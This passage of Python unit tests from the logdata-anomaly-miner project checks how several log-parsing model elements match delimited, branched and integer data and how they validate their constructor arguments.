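        self._assert_no_match(decimal_integer_value_me, b"025")
        self._assert_no_match(decimal_integer_value_me, b"0025")
        self._assert_no_match(decimal_integer_value_me, b"e+10")
        self._assert_no_match(decimal_integer_value_me, b"00")
        self._assert_no_match(decimal_integer_value_me, b"no number 22 some string.")

    def test7element_id_input_validation(self):
        """Check if element_id is validated."""
        self.assertRaises(ValueError, DecimalIntegerValueModelElement, "")  # empty element_id
        self.assertRaises(TypeError, DecimalIntegerValueModelElement, None)  # None element_id
        self.assertRaises(TypeError, DecimalIntegerValueModelElement, b"path")  # bytes element_id is not allowed
        self.assertRaises(TypeError, DecimalIntegerValueModelElement, True)  # boolean element_id is not allowed
        self.assertRaises(TypeError, DecimalIntegerValueModelElement, 123)  # integer element_id is not allowed
        self.assertRaises(TypeError, DecimalIntegerValueModelElement, 123.22)  # float element_id is not allowed
        self.assertRaises(TypeError, DecimalIntegerValueModelElement, {"id": "path"})  # dict element_id is not allowed
        self.assertRaises(TypeError, DecimalIntegerValueModelElement, ["path"])  # list element_id is not allowed
        self.assertRaises(TypeError, DecimalIntegerValueModelElement, [])  # empty list element_id is not allowed
        self.assertRaises(TypeError, DecimalIntegerValueModelElement, ())  # empty tuple element_id is not allowed
        self.assertRaises(TypeError, DecimalIntegerValueModelElement, set())  # empty set element_id is not allowed

    def test9value_sign_type_input_validation(self):
        """Check if value_sign_type is validated: the three documented strings are accepted, everything else is rejected."""
        for sign_type in ("none", "optional", "mandatory"):
            DecimalIntegerValueModelElement(self.id_, value_sign_type=sign_type)
        # A string that is not one of the allowed values is a ValueError, a wrong type is a TypeError.
        self.assertRaises(ValueError, DecimalIntegerValueModelElement, self.id_, value_sign_type="None")
        for bad_type in (None, b"none", True, 123, 123.22, {"value_sign_type": "none"}, ["none"], [], (), set()):
            self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_sign_type=bad_type)

    def test10value_pad_type_input_validation(self):
        """Check if value_pad_type is validated: the three documented strings are accepted, everything else is rejected."""
        for pad_type in ("none", "zero", "blank"):
            DecimalIntegerValueModelElement(self.id_, value_pad_type=pad_type)
        self.assertRaises(ValueError, DecimalIntegerValueModelElement, self.id_, value_pad_type="None")
        for bad_type in (None, b"none", True, 123, 123.22, {"value_sign_type": "none"}, ["none"], [], (), set()):
            self.assertRaises(TypeError, DecimalIntegerValueModelElement, self.id_, value_pad_type=bad_type)

    def test11get_match_element_match_context_input_validation(self):
        """Check if an exception is raised, when other classes than MatchContext are used in get_match_element."""
        model_element = DecimalIntegerValueModelElement(self.id_)
        data = b"123.22"
        # Both the real MatchContext and the test double are accepted.
        model_element.get_match_element(self.path, DummyMatchContext(data))
        model_element.get_match_element(self.path, MatchContext(data))
        bad_contexts = (
            MatchElement(None, data, None, None), data, data.decode(), True, 123, 123.22, None, [],
            {"key": MatchContext(data)}, set(), (), model_element)
        for bad_context in bad_contexts:
            self.assertRaises(AttributeError, model_element.get_match_element, self.path, bad_context)


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/DelimitedDataModelElementTest.py000066400000000000000000000463611437606560100316400ustar00rootroot00000000000000
import unittest
from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.MatchElement import MatchElement
from 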
unit.TestBase import TestBase, DummyMatchContext class DelimitedDataModelElementTest(TestBase): """Unittests for the DelimitedDataModelElement.""" id_ = "delimited" path = "path" delimiter = b"," def test1get_match_element_single_char(self): """A single character is used as delimiter and not consumed (consume_delimiter=False).""" data = b"this is a match context.\n" delimited_data_model_element = DelimitedDataModelElement(self.id_, b"a") value = b"this is " match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"c") value = b"this is a mat" match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"e") value = b"this is a match cont" match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"\n") value = b"this is a match context." 
match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) def test2get_match_element_single_char_no_match(self): """A single character is used as delimiter and not matched.""" data = b"this is a match context.\n" for char in "bdfgjklpqruvwyz": delimited_data_model_element = DelimitedDataModelElement(self.id_, char.encode()) match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3delimiter_string(self): """In this test case a whole string is searched for in the match_data and it is not consumed (consume_delimiter=False).""" data = b"this is a match context.\n" value = b"this" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b" is") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) value = b"th" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"is") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) value = b"this is a match " match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"context.\n") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) value = b"t" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, 
b"his is a match context.\n") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) def test4delimiter_string_no_match(self): """In this test case a whole string is searched for in the match_data with no match.""" data = b"this is a match context.\n" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"other data") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"isa") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"context\n") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"this is a match context.\n") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test5special_characters_escape(self): """In this test case special character escaping is tested. 
The delimiter is not consumed (consume_delimiter=False).""" data = b'error: the command \\"python run.py\\" was not found" ' value = b'error: the command \\"python run.py\\" was not found' match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b'"', b"\\") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) data = rb"^This is a simple regex string. It costs 10\$.$" value = rb"^This is a simple regex string. It costs 10\$." match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"$", b"\\") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) data = b"the searched file is .gitignore." value = b"the searched file is .gitignore" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b".", b" ") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) def test6special_characters_escape_no_match(self): """In this test case special character escaping is tested without matching.""" data = b'error: the command \\"python run.py\\" was not found\\" ' match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b'"', b"\\") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = rb"^This is a simple regex string. 
It costs 10\$.\$" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"$", b"\\") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"the searched file is .gitignore ." match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b".", b" ") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test7consume_delimiter(self): """In this test case check if the consume_delimiter parameter is working properly.""" data = b"this is a match context.\n" delimited_data_model_element = DelimitedDataModelElement(self.id_, b"a", consume_delimiter=True) value = b"this is a" match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"c", consume_delimiter=True) value = b"this is a matc" match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"e", consume_delimiter=True) value = b"this is a match conte" match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"\n", consume_delimiter=True) value = b"this is a match context.\n" match_context = 
DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) value = b"this is" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b" is", consume_delimiter=True) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) value = b"this" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"is", consume_delimiter=True) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) value = b"this is a match context.\n" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"context.\n", consume_delimiter=True) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) value = b"this is a match context.\n" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"his is a match context.\n", consume_delimiter=True) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) def test8consume_delimiter_no_match(self): """In this test case check if the consume_delimiter parameter is working properly and does not match data.""" data = b"this is a match context.\n" for char in "bdfgjklpqruvwyz": delimited_data_model_element = DelimitedDataModelElement(self.id_, char.encode(), 
consume_delimiter=True) match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"other data", consume_delimiter=True) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"isa", consume_delimiter=True) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"context\n", consume_delimiter=True) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"this is a match context.\n", consume_delimiter=True) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test9element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, DelimitedDataModelElement, "", self.delimiter) # empty element_id self.assertRaises(TypeError, DelimitedDataModelElement, None, self.delimiter) # None element_id self.assertRaises(TypeError, DelimitedDataModelElement, b"path", self.delimiter) # bytes element_id is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, True, self.delimiter) # boolean element_id is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, 123, 
self.delimiter) # integer element_id is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, 123.22, self.delimiter) # float element_id is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, {"id": "path"}, self.delimiter) # dict element_id is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, ["path"], self.delimiter) # list element_id is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, [], self.delimiter) # empty list element_id is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, (), self.delimiter) # empty tuple element_id is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, set(), self.delimiter) # empty set element_id is not allowed def test10escape_input_validation(self): """Check if escape is validated.""" self.assertRaises(ValueError, DelimitedDataModelElement, self.id_, self.delimiter, escape=b"") # empty escape self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, escape="\\") # string escape is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, escape=True) # boolean escape is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, escape=123) # integer escape is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, escape=123.22) # float escape is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, escape={"id": "path"}) # dict escape not allowed self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, escape=["path"]) # list escape is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, escape=[]) # empty list escape is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, escape=()) # empty tuple escape is not allowed self.assertRaises(TypeError, 
DelimitedDataModelElement, self.id_, self.delimiter, escape=set()) # empty set escape is not allowed def test11consume_delimiter_input_validation(self): """Check if consume_delimiter is validated.""" self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, consume_delimiter=b"") self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, consume_delimiter="\\") self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, consume_delimiter=123) self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, consume_delimiter=123.22) self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, consume_delimiter={"id": "path"}) self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, consume_delimiter=["path"]) self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, consume_delimiter=[]) self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, consume_delimiter=()) self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, consume_delimiter=set()) def test12get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = DelimitedDataModelElement(self.id_, self.delimiter) data = b"one, two, three" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, 
model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/ElementValueBranchModelElementTest.py000066400000000000000000000312041437606560100326400ustar00rootroot00000000000000import unittest from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ElementValueBranchModelElement import ElementValueBranchModelElement from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement, DummyFirstMatchModelElement class ElementValueBranchModelElementTest(TestBase): """Unittests for the ElementValueBranchModelElement.""" id_ = "value_branch" path = "path" value_path = "value_model" path_path = b"path: " data_path = b"data: " path_fixed_string = b"/model" data_fixed_string = b"this is some random data: 255." 
value_model = DummyFirstMatchModelElement( "branch", [DummyFixedDataModelElement("path", path_path), DummyFixedDataModelElement("data", data_path)]) path_me = DummyFixedDataModelElement(value_path, path_fixed_string) data_me = DummyFixedDataModelElement(value_path, data_fixed_string) children = [value_model, path_me, data_me] def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" element_value_branch_me = ElementValueBranchModelElement( self.id_, self.value_model, None, {"path: ": self.path_me, "data: ": self.data_me}) data = b"path: /model" match_context = DummyMatchContext(data) match_element = element_value_branch_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, [ MatchElement("path/value_branch/branch/path", self.path_path, self.path_path, None), MatchElement("path/value_branch/value_model", self.path_fixed_string, self.path_fixed_string, None)]) data = b"data: this is some random data: 255." 
match_context = DummyMatchContext(data) match_element = element_value_branch_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, [ MatchElement("path/value_branch/branch/data", self.data_path, self.data_path, None), MatchElement("path/value_branch/value_model", self.data_fixed_string, self.data_fixed_string, None)]) def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" element_value_branch_me = ElementValueBranchModelElement( self.id_, self.value_model, None, {"path: ": self.path_me, "data: ": self.data_me}) data = b"path: /random" match_context = DummyMatchContext(data) match_element = element_value_branch_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"path: this is some random data: 255." match_context = DummyMatchContext(data) match_element = element_value_branch_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"data: /model" match_context = DummyMatchContext(data) match_element = element_value_branch_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"path: " match_context = DummyMatchContext(data) match_element = element_value_branch_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"data: " match_context = DummyMatchContext(data) match_element = element_value_branch_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" branch_model_dict = {"path: ": self.path_me, "data: ": self.data_me} self.assertRaises(ValueError, ElementValueBranchModelElement, "", 
self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, None, self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, b"path", self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, True, self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, 123, self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, 123.22, self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, {"id": "path"}, self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, ["path"], self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, [], self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, (), self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, set(), self.value_model, None, branch_model_dict) def test4value_model_input_validation(self): """Check if value_model is validated.""" branch_model_dict = {"path: ": self.path_me, "data: ": self.data_me} self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, "path", None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, None, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, b"path", None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, True, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, 123, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, 123.22, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, 
self.id_, True, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, {"id": "path"}, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, ["path"], None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, [], None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, (), None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, set(), None, branch_model_dict) def test5value_path_input_validation(self): """Check if value_path is validated.""" branch_model_dict = {"path: ": self.path_me, "data: ": self.data_me} self.assertRaises(ValueError, ElementValueBranchModelElement, self.id_, self.value_model, "", branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, b"path", branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, True, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, 123, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, 123.22, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, {"id": "path"}, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, ["path"], branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, [], branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, (), branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, set(), branch_model_dict) def test6branch_model_dict_input_validation(self): """Check if value_path is validated.""" self.assertRaises(TypeError, 
ElementValueBranchModelElement, self.id_, self.value_model, None, "path") self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, None) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, b"path") self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, True) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, 123) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, 123.22) # dict branch_model_dict without ModelElementInterface values is not allowed self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, {"id": "path"}) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, ["path"]) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, []) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, ()) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, set()) def test7default_branch_input_validation(self): """Check if value_path is validated.""" branch_model_dict = {"path: ": self.path_me, "data: ": self.data_me} self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, "path") self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, b"path") self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, True) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, 123) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, 123.22) self.assertRaises(TypeError, ElementValueBranchModelElement, 
self.id_, self.value_model, None, branch_model_dict, {"id": "path"}) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, ["path"]) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, []) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, ()) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, set()) def test8get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = ElementValueBranchModelElement(self.id_, self.value_model, None, {"path: ": self.path_me, "data: ": self.data_me}) data = b"abcdefghijklmnopqrstuvwxyz.!?" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, 
self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/FirstMatchModelElementTest.py000066400000000000000000000174771437606560100312200ustar00rootroot00000000000000import unittest from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement class FirstDataModelElementTest(TestBase): """Unittests for the FirstDataModelElement.""" id_ = "first" path = "path" me1 = DummyFixedDataModelElement("me1", b"The first fixed string.") me2 = DummyFixedDataModelElement("me2", b"Random string23.") me3 = DummyFixedDataModelElement("me3", b"Random string2") children = [me1, me2, me3] def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" data = b"The first fixed string. Random string23." value = b"The first fixed string." match_context = DummyMatchContext(data) first_match_me = FirstMatchModelElement(self.id_, self.children) match_element = first_match_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_+"/me1", self.path, value, value, None) data = b"Random string23. Random string23." value = b"Random string23." match_context = DummyMatchContext(data) first_match_me = FirstMatchModelElement(self.id_, self.children) match_element = first_match_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/me2", self.path, value, value, None) data = b"Random string2 Random string23." 
value = b"Random string2" match_context = DummyMatchContext(data) first_match_me = FirstMatchModelElement(self.id_, self.children) match_element = first_match_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/me3", self.path, value, value, None) data = b"Random string24. Random string23." value = b"Random string2" match_context = DummyMatchContext(data) first_match_me = FirstMatchModelElement(self.id_, self.children) match_element = first_match_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/me3", self.path, value, value, None) def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" data = b"some none matching string" match_context = DummyMatchContext(data) first_match_me = FirstMatchModelElement(self.id_, self.children) match_element = first_match_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"The first fixed string" match_context = DummyMatchContext(data) first_match_me = FirstMatchModelElement(self.id_, self.children) match_element = first_match_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"Random string42" match_context = DummyMatchContext(data) first_match_me = FirstMatchModelElement(self.id_, self.children) match_element = first_match_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, FirstMatchModelElement, "", self.children) # empty element_id self.assertRaises(TypeError, FirstMatchModelElement, None, self.children) # None element_id self.assertRaises(TypeError, FirstMatchModelElement, b"path", 
self.children) # bytes element_id is not allowed self.assertRaises(TypeError, FirstMatchModelElement, True, self.children) # boolean element_id is not allowed self.assertRaises(TypeError, FirstMatchModelElement, 123, self.children) # integer element_id is not allowed self.assertRaises(TypeError, FirstMatchModelElement, 123.22, self.children) # float element_id is not allowed self.assertRaises(TypeError, FirstMatchModelElement, {"id": "path"}, self.children) # dict element_id is not allowed self.assertRaises(TypeError, FirstMatchModelElement, ["path"], self.children) # list element_id is not allowed self.assertRaises(TypeError, FirstMatchModelElement, [], self.children) # empty list element_id is not allowed self.assertRaises(TypeError, FirstMatchModelElement, (), self.children) # empty tuple element_id is not allowed self.assertRaises(TypeError, FirstMatchModelElement, set(), self.children) # empty set element_id is not allowed def test4children_input_validation(self): """Check if children is validated.""" self.assertRaises(TypeError, FirstMatchModelElement, self.id_, "path") # string children self.assertRaises(TypeError, FirstMatchModelElement, self.id_, None) # None children self.assertRaises(TypeError, FirstMatchModelElement, self.id_, b"path") # bytes children is not allowed self.assertRaises(TypeError, FirstMatchModelElement, self.id_, True) # boolean children is not allowed self.assertRaises(TypeError, FirstMatchModelElement, self.id_, 123) # integer children is not allowed self.assertRaises(TypeError, FirstMatchModelElement, self.id_, 123.22) # float children is not allowed self.assertRaises(TypeError, FirstMatchModelElement, self.id_, {"id": "path"}) # dict children is not allowed # list children with no ModelElementInterface elements is not allowed self.assertRaises(TypeError, 